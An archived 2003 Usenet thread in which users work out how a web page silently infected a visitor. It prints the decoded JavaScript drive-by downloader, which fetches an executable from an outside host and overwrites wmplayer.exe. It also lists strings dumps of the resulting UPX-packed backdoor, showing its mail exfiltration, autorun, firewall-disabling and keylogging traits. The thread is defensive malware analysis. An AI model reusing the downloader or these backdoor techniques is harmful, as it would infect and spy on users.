Web Page Hack!!

newsgroup

non lue,

3 oct. 2003, 05:15:2303/10/2003

à

Can someone help me figure out what virus this is? It appeared on a web
page and instantly my Zonealarm and Norton AV shut down. I know I was
infected with something but can't figure out what it is yet. Thanks.

Karel

non lue,

3 oct. 2003, 06:22:3903/10/2003

à

"newsgroup" <dontm...@pcconnect.net> schreef in bericht
news:L6bfb.13363$NX3....@newsread3.news.pas.earthlink.net...

> Can someone help me figure out what virus this is? It appeared on a
web
> page and instantly my Zonealarm and Norton AV shut down.

It is not a virus but a javascript and I don't use the crystalball
method anymore.

> I know I was infected with something but can't figure out what it is
yet.

How you determined this.

Tell us the URL and maybe something will come out.

Jibba Jabba

non lue,

3 oct. 2003, 06:26:0403/10/2003

à

Ok looks like the hidden javascript translates to this:

file://javascript:eval('var x = new
ActiveXObject("Microsoft.XMLHTTP");\r\nx.Open("GET","http:%2f%2fwww.lhconlin
e.net%2fjs%wfmmc.exe",0);\r\nx.Send();\r\nvar s = new ActiveXObject("AD
ODB.Stream");\r\ns.Mode = 3;\r\ns.Type =
1;\r\ns.Open();\r\ns.Write(x.responseBody);\r\ns.SaveToFile("C:\\\\Program
Files\\\\Windows Media Player\\\\wmplayer.exe",2);\r\nlocation.href =
"mms:%2f%2f";\r\n')

So, the virus is actually downloaded from:
http://www.lhconline.net/js/mmc.exe

Can someone help me analyze that exe file to find out what virus it is and
how I can clean it up?

Karel

non lue,

3 oct. 2003, 06:29:5603/10/2003

à

"Jibba Jabba" <dontm...@pcconnect.net> schreef in bericht
news:09cfb.13376$NX3....@newsread3.news.pas.earthlink.net...

> Ok looks like the hidden javascript translates to this:
>

> Can someone help me analyze that exe file to find out what virus it is

and
> how I can clean it up?

Backdoor AMQ http://vil.nai.com/vil/content/v_100037.htm

ReTay

non lue,

3 oct. 2003, 06:31:1903/10/2003

à

"newsgroup" <dontm...@pcconnect.net> wrote in message
news:L6bfb.13363$NX3....@newsread3.news.pas.earthlink.net...

> Can someone help me figure out what virus this is? It appeared on a web
> page and instantly my Zonealarm and Norton AV shut down. I know I was
> infected with something but can't figure out what it is yet. Thanks.
>

If it took your ZA and Norton went down have you sent this on to them?
ZA dropping does not surprise me. This makes me think of a new Trojan
making the rounds. It over rides the victims DNS settings and hijacks their
browser. It forces the browser (IE only) to whatever web page the attacker
wishes. This could be a nasty little surprise waiting on the other end.

Jibba Jabba

non lue,

3 oct. 2003, 06:57:3503/10/2003

à

Ok the AMQ trojan will obviously use the net to notify the author and do
other sorts of nasty stuff, so I don't want that happening. However, I also
need to go online in order to download the latest anti-virus definitions.
How shall I proceed here? I am using Norton Antivirus.

Thanks

"Karel" <s...@chello.nl> wrote in message
news:Ddcfb.8384$P51.17213@amstwist00...

Karl Levinson [x y] mvp

non lue,

3 oct. 2003, 07:00:3703/10/2003

à

Generally, scanning the file using several up to date antivirus programs
and/or then submitting the file to one or more antivirus vendors using the
instructions on their web pages is the best way to do such things. Assuming
antivirus does not detect it, non-antivirus researchers would be more likely
to be able to determine only what the program does [and probably not
everything that it does] rather than what it is.

"newsgroup" <dontm...@pcconnect.net> wrote in message
news:L6bfb.13363$NX3....@newsread3.news.pas.earthlink.net...

Karel

non lue,

3 oct. 2003, 07:15:4703/10/2003

à

"Jibba Jabba" <dontm...@pcconnect.net> schreef in bericht

news:zCcfb.13385$NX3....@newsread3.news.pas.earthlink.net...

> Ok the AMQ trojan will obviously use the net to notify the author and
do
> other sorts of nasty stuff, so I don't want that happening. However,
I also
> need to go online in order to download the latest anti-virus
definitions.
> How shall I proceed here? I am using Norton Antivirus.
>
> Thanks

It is a trojan from november 2002 do you think your Definitions are that
old? And if so just update them nothing will go wrong.

Mimic

non lue,

3 oct. 2003, 09:27:0803/10/2003

à

"newsgroup" <dontm...@pcconnect.net> wrote in message
news:L6bfb.13363$NX3....@newsread3.news.pas.earthlink.net...

Well all that hex shit at the is shellcode (?) so my initial thoughts would
be some kinda buffer overflow to executethe shellcode, but having said this
its a script, so it could just be hidden code that gets decoded and
executed. like you can do in irc. :P But anyway, I dont know JS so i wouldnt
be the best person to ask, you could try Doc Jeff or someone in a html/JS
group (if no one else here knows)

--
Mimic

"Without Knowledge you have fear, With fear you create your own nightmares."
"There are 10 types of people in this world. Those that understand Binary,
and those that dont."
"C makes it easy to shoot yourself in the foot. C++ makes it harder, but
when you do, it blows away your whole leg"

Bill Sanderson

non lue,

3 oct. 2003, 11:50:3103/10/2003

à

FIREWALL!

Get a firewall in place to prevent incoming unsolicited packets, and
interdict outgoing packets that you don't authorize.

XP's firewall isn't sufficient--you need a third-party: Kerio, Zone Labs,
Tiny.

"Jibba Jabba" <dontm...@pcconnect.net> wrote in message
news:zCcfb.13385$NX3....@newsread3.news.pas.earthlink.net...

Bill Sanderson

non lue,

3 oct. 2003, 11:51:3003/10/2003

à

And, of course, maintain current antivirus protection?

http://www.grisoft.com offers free, updated virus protection for
individuals.

"Jibba Jabba" <dontm...@pcconnect.net> wrote in message
news:zCcfb.13385$NX3....@newsread3.news.pas.earthlink.net...

Torti Schlumpf

non lue,

3 oct. 2003, 12:53:5503/10/2003

à

Karel wrote:

> It is a trojan from november 2002 do you think your Definitions are that
> old? And if so just update them nothing will go wrong.

You're wrong. Norton has got lots of problems detecting runtime packed
malware, especially backdoors.

This one is:
Backdoor.Beastdoor.202, upx-runtime packed!

--
Regards, Torti

Torti Schlumpf

non lue,

3 oct. 2003, 12:56:1803/10/2003

à

Jibba Jabba wrote:

> How shall I proceed here? I am using Norton Antivirus.

*Although* you've got the newest signature updates, Norton will have
problems to detect such malware (backdoor, *runtime-packed*).

Try a better anti virus using KAV-engine.

--
Regards, Torti

donutbandit

non lue,

3 oct. 2003, 12:49:2603/10/2003

à

"Jibba Jabba" <dontm...@pcconnect.net> wrote in

news:09cfb.13376$NX3....@newsread3.news.pas.earthlink.net:

> So, the virus is actually downloaded from:
> http://www.lhconline.net/js/mmc.exe

I went to this page using Firebird, and was prompted to decide what to do
with mmc.exe.

If you'd simply had Install On Demand in Internet Explorer turned off, this
wouldn't have happened to you.

Use this little scare to get serious about the security of your computer,
and learn something about it. Obviously, you thought that simply having
Zone Alarm and Norton was enough. It isn't.

Unfortunately, a scare is what it takes for many of us, myself included.

Triquetra

non lue,

3 oct. 2003, 17:58:2603/10/2003

à

"Bill Sanderson" <Bill_Sa...@msn.com.plugh.org> wrote in message
news:u4WOpZc...@TK2MSFTNGP12.phx.gbl...

> FIREWALL!
>
> Get a firewall in place to prevent incoming unsolicited packets, and
> interdict outgoing packets that you don't authorize.
>
> XP's firewall isn't sufficient--you need a third-party: Kerio, Zone Labs,
> Tiny.

Yep, I've had this same trojan blocked several times trying to connect
through port 666.

jayjwa

non lue,

4 oct. 2003, 03:43:1004/10/2003

à

I thought shellcode too, but I looked inside and it's got SMTP commands
to a mail server, you know "HELO MAIL FROM:" type stuff.

Here's the readable parts of it, the mmc.exe binary:

> This program must be run under Win32
> UPX0
> UPX1
> .rsrc
> 1.20
> UPX!
> E/ ]
> StringX
> TObject
> |xtp
> lhd2
> XTP
> 2LHD
> R8!;l
> LY9
> = -!
> PRQ:
> =YZX
> .-t+
> _<ar
> (LmWs
> VQA;
> &jhV@
> L5R<
> ^@nI)
> H{Bw
> uX0E
> /w)f%.
> 76nhu=
> t!z#
> F| t
> +//?
> t_$xtZXtU0u
> w%9
> i}q F
> ~ExC[)l
> h#P:[
> *[`
> I)Y`kq
> ~ChA
> 6V,y
> "4yX
> 0{&}C
> mP0T
> '6hd*
> R_]9
> a.w
> ZTUWVSA
> g!9Z
> d$,YH
> ,t\=
> =Ht^`
> r6tm{
> /'=t&
> D&B;
> n `]
> ,Joo
> T-l>
> ZWjQ6
> ^]c^
> !(ZPU
> uXG=
> w>5q
> '#!A
> gC ~)/
> G~$P
> ;?RGW
> MtV|
> CaAZ
> uXJt
> "+8A
> 7t1S
> <##H@
> Xw&J|
> }&Z~")
> 'FR]w~
> Z9PX25
>>l\h:
> l ,n
> A,_i
> @[:G
> 0zV'
> bK< X
> 3CRa}
> C#WZ
> JO8|"G
> ItR!X"'>
> v|/t
> HP)^@_~
> kernel32.dll
> GetLo
> ngPa
> NameA
> kwEx@8@
> C@t(
> p`Vd
> jxtAra
> oftware\Be
> orland\Qcales
> qD}phi"
> s>d\
> s Copyright (V
> c) 19
> ,2003 Ave
> by NhT/j@y
> (;2X{
> CYJ&3
> A|xtd
> d`\A
> dXTP
> LHD@
> A<84d
> 0,( '
> lhd
> 2`\X
> TPLH
> D@<2
> ,($"
> <BoWVj
> G 6:
> B.9,
> eToolh
> 32SnapshotH
> ListFi
> Next
> sMem
> WW[,Y
> Module
> Funcz'
> [;KERNELDLL
> WinSta0
> 8-t/@
> mTV%
> Au.1
> http://w
> mail.
> ;=com
> Log9\Z
> M%#s
> \RAS Aut
> 7|ial\C2t
> a.fr_
> 7aHOuu
> %'Cr`&
> @?r@
> Yv*/$'
> +*oNX
> $'QP
> $%8R
> %-aX
> US W
> qWP
> '$GW
> !$
> e$ $
> %WIK
> < yxW1Y
> (,3D
> ((,(!'L
> J\8D
> 3<88<
> l+yX|
>>h 1
> 4S@Q
> PCc?
> 8tTz
> web.icqy
> OST /scripts
> /WWPMsg? HTTP/1.0
> 3ost: wwp.mirX
> abilisK:8$
> -type+ap@w
> p$ca
> p-form-url#9ded7
> gth94T
> Accepy*/vA
> +Send
> E@#`
> <a&Rp|B
> =~Dt1d
> WbHO`
> CBY,
> ;,o[
> -p$Rq
> tfT2*`]
> ;A0G3
> G nA|
> 0f `1
> gM{ G
> PibA|
> jd#0|
> Vi@eo
> N y_
> ~#3#.b
> if ex
> f qgC%0
> :k[;K`
> lcWVo
> 56wh[
> p@,=_
> x jed
> (rT<>
> B o!D
> C/D
> @XGs
> c%I.3[X
> #irU
> <'a%
> .EX
> %7$P9
> =f+e
> (FOi.@
> b"'YSTEM\Curr
> ASet\o
> Imag%
> c#O-c
> KY9|
> g6#\u
> LyLN
> $'Y8=
> c@ju
> mk,1c
>>A"'{
> 7/C><0
> SD;~W
> dT~P
> ?92.168
> need
> file
> data
> !insuf,ci1 m
> u$! |
> !<xY
> V8wc|7
> *t}ta]
> J] C$-
> SUKP1
> XaC
> AM,u
> 7vyvHp;^|t5
> @*u}
> @JQ)
> 0Jov
> pCDH
> za]&[
> @'VRv
> *PS]Oz
> 0};!
> A P2
> 88D<
> nwKT
> l;ds
> 4$/>:)
> s{4+
> ;CdwpVNf
> d)kT
> QV[9
> %g'8
> w#_}yn
> T,|#WE
> ;wC+
> ns[mST
> ZsUH#
> jgR.
> y&H=
> z-YB
> 4BP*[
> KXlX
> X;KxwV
> {<JBu
> X$`L
> F${d9
> SxsP}
> `+Sh
> &H#-
> \'ppJ)
> z"pu
> 4CK(
> .X :#~
> sSc_d
> D#5&-
> iFDe
> c?|;
> O9 n
> .[st
> #4|0
> [s&6
> m=$r
> rvBb
> eB~
> mG=B)
> ]9 I
> 7knt
> 3s$t^x$
> @j[S
> v$C66;
> {m_P+
> fr fwp
> h(;U
> \>H7X
> ]M`=
> <T~!
> ; ZJN
> F aq
> ,yQ,
> KY|,
> D,${
> *$-}
> Y3JF
> h`]4QC
> 's0.RY
> ];Bu
> =,vo
> NF0W
> 9`TM
> ,2
> +#A)
> DCTV
> wS-YH
> ;C,u)
> R^(t!K7@
> n9 a-
> T>LK
> k;=v
> ;PZR
> ?WK`
> lnU&Z
> TXyaB
> T|ix
> 3TzP
> DP{}nG<RVR
> \Y~B
> C#<84
> `j K
> =DST
> %\B(O+
> 4SKTJS
> j)|~s
> K"pK
> PS8,
> MF\Z
> {Q{D
> g+ t
> "l,B
> ^}u#'
> r6[KK%B!
> [u1S
> BkdQH/
> $3FR(L
> vD'Q
> B0SW
> 4lyr
> :Ds=
> RfI4
> Z}&@#
> }iO(
> &<Hu
> ,e(9(pX
> dpn&*&
> _`' (-6)
> 3)W~
> 2)n A
> \;nd#"_
> # Ex
> d([p]O
> PngE
> InvalidCRC
> NGMis
> bMulp
> IDATH
> ZLIBw
> ette
> Size
> Unknown
> d]NotP
> TPoi
> e]AY
> TChu
> IEND
> gAMA
> PLTE
> tRNS
> r;@FP
> ^IMC
> OZ];
> J`kC
> I8 G
> g pA&
> ?v-|
> /X"Z
> )hQ)
> *Y[$
> Cr9G
> _^d,
> uAUs
> {[X\
> |EfIW
> [X'6
> aAx/
> Xv"o
> t*@.
> {iB9+5
> 2%<wl
> HZD=
> j(-pp
> PV xvB
> DHD:,
> tb@FIu
> xv;K
> \9`]
> EwoPa.
> BAQJs
> ,$MjoQ\
> p!"Ph}W
> 6Bgk
>>O<AM
> 0D =
> }58]
> d<[O
> cFIW7
> {C@0
> V}1\
> wD;VMa
> F4qvt
> vCLPW
> loQ{;
> uC&;
> rbF\=
> d:IC
> fE-@
> rv{B
> J;r,
> $(T/E
> O~,4
> Vz8T
> tid8
> 70U1c
> JB%H
> BC+45
> le/e
> ^;Qd
> R,lK
> @_aI
> WT;
> "~Ho;
> COu$
> *&(*,A
> tSCg
> hTma!
> *sum
> r0G_T
> v,)&PfG
> CN(A
> ?FbT
> \}g#
> ;HEl
> (BQI
> 5H%A
> 3>TG
> bY8@
> ]UaE
> &f%j!M
> h%/W E,E
> cxAv
> YPl-
> 9"`c
> TUDP
> ,,s,,>,Y
> TMxQuery
> TSMT1
> 2l.l
> u |h
> fD-j
> U" My`
> ..O:
> T!hP:6
> 0+E36a
> +1 *
> *Y1o
> $-v2
> W"L>
> %CA;
> !dn0
> ns1.ip
> lus.net0
> &^VQ
> \s)A
> HELO
> AIL FROM:<
> RCPT TO
> }C~DATA#S
> O.;QUIT
> SB``
> 8hd=X
> dH,'l
> #Orv
> (GP,E
> 8C(0
> #DtR
> v@ d{Kb
> g\6XB
> U>d;
> ~<J!
> 2Zdp7
> ~d[<X
> !.x
> o [d
> (dZ!
> D9BC
> VP7Kk
> B A{
> _WhK
> P b44
> d!2@
> ,o2!G
> 08p8$
> YZrHr
> ^KNr2
> fc{ U
> XLX.PIF
> eastyA
> OFTWAREJ
> rdows
> COM
> sag*
> c[uw
> ve=tupj
> `?s\{42AC031}k
> 2-EE51-A3CC
> 40AA
> E6115C}wSHb>
> Run;
> ]`oND
> BuildNumb
> \Bg
> DGor=
>>_HardDe
> pCd\Sy
> emz\
> s".m
> heU_T>
> [\5ma
> Exple
> #.tf_
> Boot:[K]-
> ZkVD
> LL6)0
> _H-0
> =;[M
> xqFVN
> G0G0
> B!Kt*
> $dgp
> uXxT
> D h,
> $z.6
> GJ&0l
> dI9+
> mkc}
> 5,a0fz
> /Xdd"
> $0<kt
> HTkwB
> ay$
> |),RxZH&y
> 78(1
> "J@,
> bQuR
> {UNDO}
> <DEL)
> {F+:
> ;+2
> 2=<,
> _>?
> 2 ~`2
> 2{[|A
> <"'{U-
> $dT^7
> \z @yyv/d
> Z4{M
> 4 ;h{
> HJKz
> T"E^
> 66VS*us0!
> *ip*p|`[A
> GC-`
> "KTT
> h~PU
> 85'6o
> @#8aw
> ,xGx ?)
> ~#1.bmp
> <RE#
> }c+&l
> eyeo
> l!30
> Ap!Fb
> ^m0F
> ?,Fl
> [Hm{
> he'x
> %NdyFx
> dB "8
> x.pif_1
> 7/;h
> p0*-
> hF/@
> )."P
> =:l?
> y8B<l
> x$ia
> }>4,
> uW$"aaYY
> $d$Gw'
> j:e
> b+l(
> !'Mw
> $N
> a3au
> yb4^g
> ;lU pA.
> pw
> Dcd{C
> gddd
> {5{2
> Dv 9
> jzX1
> nY%
> RaoD/&
> set cd
> dio
> Go %C
> hif;
> SPEC7 /C
> +~/>G
> 2$04-
> h8(,hD
> hP_
> %_$h\(hh8ht
> '2.02
> ("C8,
> Oi3Hte
> I<<[
> c=-p
> ,Ld;4
> epgM
> i'tklm4M
> 4nofqhM
> Cvwx@
> 4yWh
> 'nr+
> }7ks
> 7'?e
> ldwz
> flI ,
> 5-2 Jean-l
> oup GvlyB
> 'ceh
> #+3;5
> 4MCSc
> 40@`
> }/#G`<
> ;x8A
> 4S|<
> 3v62
> c~>2
> ,UA]@?
> Mark
> AdlKb
> ub"b
> Pyna
> bi0@
> \X#KlR6{k
> al/#F@G6
> 4M0p
> H(h4M
> 5M4t
> 8@P`p
> okgc_
> {[WSOKG
> }f{B[
> p8,D
> o xy
> symbolsZ
> HX#
> RvdxP
> 4t0]
> 5Md~}
> @RTA
> "kI/
> NyEl
> tuKE,
> p3c5"
> /In/t
> u!)^w
> o!cqn
> a3 (
> #w]r
> u;dlfl
> uEtC
> sgOia
> [eS/B
> FiW:
> sSpU n
> r}'Cw
> ,SuOv
> Cx)l
> yW'p
> ukMw
> !acg#
> {u t
> TYWEa
> &=O8
> pngl
> TlH&%
> B3E@
> Emlu
> NMaA
> 2Uu:.'
> uA AK
> VIExA81
> A.Addr
> fo0LaO
> sH^i
> Wre1
> ha2 d
> E)Of7Rtl:wmk
> DyH?
> Movf
> StdH
> 0Al=c6`g1
> 'Sus
> qWSkBl
> B;Ti
> n[ct
> M_%v
> Cz=b
> UnkK
> G:vs
> abYR
> *Key
> &N_(
>> UA2l
> B60$
> %Ec'
> SV,4
> BjDe
> r UR
> l_a7
> _ev\
> D`Bk0J.H
> Onsl2.|
> h9?#
> pbx1ko{rdD2a
> xco/Is
> XFVC
> o/]uAE
> 26.Dk
> G*GzI
> 1h(N_
> 40mci/F
> WSAC9
> d6CODE
> .idH\
> '@ _
> wwwp
> KERNEL32.DLL
> advapi32.dll
> AVICAP32.DLL
> gdi32.dll
> oleaut32.dll
> URLMON.DLL
> user32.dll
> wininet.dll
> winmm.dll
> wsock32.dll
> LoadLibraryA
> GetProcAddress
> ExitProcess
> RegEnumKeyA
> capCreateCaptureWindowA
> BitBlt
> SysFreeString
> URLDownloadToFileA
> GetDC
> InternetCheckConnectionA
> mciSendStringA
> send
> $TTY
> hetf
> mho_qhk
> h]gk^
> v\eoTqdX
> rQ}d

NetName: Bandx-GNXOnline
band-x.com / GNX Online
London

And no, the newest version of f-prot didn't detect anything, but that
doesn't mean too much, I've seen it find backdoors and I've seen it not.
If that's what this is....

--
--------------nonoffensive sig.v2.2RC2?------------------------
- jayjwa 4 Spammers: mailto: lis...@listme.dsbl.org
The New Atr2. PGP/GPG Keys onsite
"Why do all the noob's use RedHat,
speak 4th grade English,
and cry because their X server crashed?"
Send HTTP1.1 GET to /cgi-bin/ping-jay.cgi, my domain, 2 mail
==Atr2.Ath.Cx: Linux Tough, Powered by Slackware.=============

Karel

non lue,

4 oct. 2003, 07:52:4604/10/2003

à

"jayjwa" <jay...@hotspam.microsoftsux.suk> schreef in bericht
news:vntca2r...@corp.supernews.com...

> Mimic wrote:
> > "newsgroup" <dontm...@pcconnect.net> wrote in message
> > news:L6bfb.13363$NX3....@newsread3.news.pas.earthlink.net...

> NetName: Bandx-GNXOnline
> band-x.com / GNX Online
> London
>
> And no, the newest version of f-prot didn't detect anything, but that
> doesn't mean too much, I've seen it find backdoors and I've seen it
not.
> If that's what this is....

The script is refering to the following:
http://www.lhconline.net/js/mmc.exe
mmc.exe is in fact: Backdoor AMQ see:
http://vil.nai.com/vil/content/v_100037.htm

"@micro$oft.com >

non lue,

4 oct. 2003, 06:15:0904/10/2003

à

I just wondered my f-prot didn't pick this one up. It has found lots of
backdoors before, so I know it can. This is the new version, I just
DL'ed it a few days ago.

What makes you so sure it's this one? It didn't say anything about any
mail SMTP commands, yet you can see them in the file, I have a copy
here. There are alot of backdoors.

Karel

non lue,

4 oct. 2003, 10:25:4704/10/2003

à

"@micro$oft.com" <""billyboi\"@micro$oft.com"> schreef in bericht
news:vntl71k...@corp.supernews.com...

I went to the link mentioned in my previous post and McAfee VS 6 pro
told me it was Backdoor AMQ.
So either your AVP sucks or mine is better or mine is wrong. Take your
pick.

Mimic

non lue,

6 oct. 2003, 11:46:2506/10/2003

à

"jayjwa" <jay...@hotspam.microsoftsux.suk> wrote in message
news:vntca2r...@corp.supernews.com...

> Mimic wrote:
> > Well all that hex shit at the is shellcode (?) so my initial thoughts
would
> > be some kinda buffer overflow to executethe shellcode, but having said
this
> > its a script, so it could just be hidden code that gets decoded and
> > executed. like you can do in irc. :P But anyway, I dont know JS so i
wouldnt
> > be the best person to ask, you could try Doc Jeff or someone in a
html/JS
> > group (if no one else here knows)
> >
> > --
> > Mimic
> >
> > "Without Knowledge you have fear, With fear you create your own
nightmares."
> > "There are 10 types of people in this world. Those that understand
Binary,
> > and those that dont."
> > "C makes it easy to shoot yourself in the foot. C++ makes it harder, but
> > when you do, it blows away your whole leg"
> >
> >
> >
>
> I thought shellcode too, but I looked inside and it's got SMTP commands
> to a mail server, you know "HELO MAIL FROM:" type stuff.
>
> Here's the readable parts of it, the mmc.exe binary:
>

yeah i mean the shellcode is the code to fetch the mmc.exe and run it, or
whatever :P

Karel

non lue,

6 oct. 2003, 14:15:2506/10/2003

à

"Mimic" <nu...@void.net> schreef in bericht
news:tFOdnTBvv6_...@brightview.com...

> "jayjwa" <jay...@hotspam.microsoftsux.suk> wrote in message
> news:vntca2r...@corp.supernews.com...
>

> "Without Knowledge you have fear, With fear you create your own
nightmares."
> "There are 10 types of people in this world. Those that understand
Binary,
> and those that dont."
> "C makes it easy to shoot yourself in the foot. C++ makes it harder,
but
> when you do, it blows away your whole leg"

So? You lost a limb or what? I didn't.

Ant

non lue,

6 oct. 2003, 20:27:4906/10/2003

à

"Torti Schlumpf" <tortis...@arcor.de> wrote...

[snip]

> This one is:
> Backdoor.Beastdoor.202, upx-runtime packed!

Here are some strings from the unpacked UPX which may indicate what
it is/does. The "..."s are where I've snipped chunks. The word
"Beasty" is in there.

...
Portions Copyright (c) 1999,2003 Avenger by NhT
...
http://www.
mail.hotmail.com
LoginSessionDisable
Software\Microsoft\RAS Autodial\Control
microsoft.com
nea.fr
...
web.icq.com
POST /scripts/WWPMsg.dll HTTP/1.0
Host: wwp.mirabilis.com:80
Content-type: application/x-www-form-urlencoded
Content-length: 480
Accept: */*
from=
&fromemail=
&subject=
&body=
&to=
&Send=
...
#3#.bat
del "
if exist "
" goto q
del %0
...
SYSTEM\CurrentControlSet\Services\
ImagePath
.EXE
...
192.168
...
TUDP
TMxQuery
TSMTP
...
ns1.ip-plus.net
...
HELO
MAIL FROM:<
RCPT TO:<
DATA
Subject:
QUIT
...
SHELLX.PIF
Beasty
SOFTWARE\Microsoft\Windows
\CurrentVersion
COM Service
msagent\
SOFTWARE\Microsoft\Active Setup\Installed Components\{42AC0312-EE51-A3CC-EA32-40AA12E6115C}
StubPath
\Run
COMMAND\
ProductName
CurrentBuildNumber
ProcessorNameString
Hardware\Description\System\CentralProcessor\0
sys.mss
sys.msx
Shell_TrayWnd
\shell\open\command
Explorer.exe
#.tty
SharedAccess
Start
SYSTEM\CurrentControlSet\Services\SharedAccess
NT\CurrentVersion\SystemRestore
DisableSR
.blf
************ Boot:[
...
^^^^^^^^^^^^ Shut Down:[
...
{UNDO}
{TAB}
{DEL}
...
*user*
*ip*
*port*
*pass*
...
~#1.bmp
...
shellx.pif
...
set cdaudio door open
set cdaudio door closed
...
WSACleanup
WSAStartup
WSAAsyncSelect
gethostname
gethostbyname
socket
shutdown
send
recv
listen
inet_ntoa
inet_addr
htons
htonl
connect
closesocket
bind
accept
...
server
pnglang
SysInit
System
pngzlib
WinSvc
KWindows
UTypes
TlHelp32
WinSock
3Messages
TEml
Funcz
pngimage
NMainUnit
$TTY

Répondre à tous

Répondre à l'auteur

Transférer